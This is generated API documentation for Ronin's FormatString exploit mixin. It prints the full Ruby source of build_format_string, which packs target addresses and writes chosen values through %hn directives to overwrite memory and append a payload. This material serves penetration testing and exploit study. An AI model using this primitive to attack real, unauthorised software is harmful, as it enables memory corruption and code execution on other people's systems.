Module: Ronin::Exploits::Mixins::FormatString

Includes:
Binary
Defined in:
lib/ronin/exploits/mixins/format_string.rb

Overview

Adds methods to exploits for generating format strings to be used in format string vulnerabilities.

Since:

  • 1.0.0

API:

  • public

Instance Method Summary collapse

Methods included from Binary

#pack, #perform_validate, #platform

Instance Method Details

#build_format_string(overwrite:, pop_length:, address:, payload:) ⇒ String

Builds a format string.

Parameters:

  • The address to overwrite.

  • The address to write.

  • The payload append to the format string.

Returns:

  • The built format string.

Since:

  • 1.0.0

API:

  • public



55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
 
# File 'lib/ronin/exploits/mixins/format_string.rb', line 55

def build_format_string(overwrite: , pop_length: , address: , payload: )
  machine_word = platform[:machine_word]

  buffer = String.new(encoding: Encoding::ASCII_8BIT)
  buffer << pack(:machine_word,overwrite)
  buffer << pack(:machine_word,overwrite + (machine_word.size / 2))

  low_mask = 0xff

  (machine_word.size / 2).times do
    low_mask <<= 8
    low_mask  |= 0xff
  end

  high_mask = low_mask << ((machine_word.size * 8) / 2)

  high = (address & high_mask) >> (machine_word.size / 2)
  low  = address & low_mask

  if low < high
    low    -= (machine_word.size * 2)
    buffer << format("%%.%ud%%%u$hn%%.%ud%%%u$hn",low,pop_length,high - low,pop_length + 1)
  else
    high   -= (machine_word.size * 2)
    buffer << format("%%.%ud%%%u$hn%%.%ud%%%u$hn",high,pop_length + 1,low - high,pop_length)
  end

  buffer << payload.to_s
  return buffer
end